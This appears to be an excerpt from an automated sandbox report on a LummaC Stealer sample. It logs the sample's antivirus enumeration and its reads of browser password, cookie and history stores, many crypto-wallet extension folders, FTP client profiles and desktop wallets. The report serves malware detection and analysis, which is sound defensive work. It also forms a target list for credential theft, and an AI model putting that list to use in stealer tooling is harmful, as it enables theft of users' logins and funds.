Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\random.exe.10.exe

Code function: 0_2_00E959A7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00E959A7

Source: C:\Users\user\Desktop\random.exe.10.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: random.exe.10.exe, 00000003.00000003.1737571443.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738560783.0000000000D82000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\random.exe.10.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: random.exe.10.exe PID: 7908, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
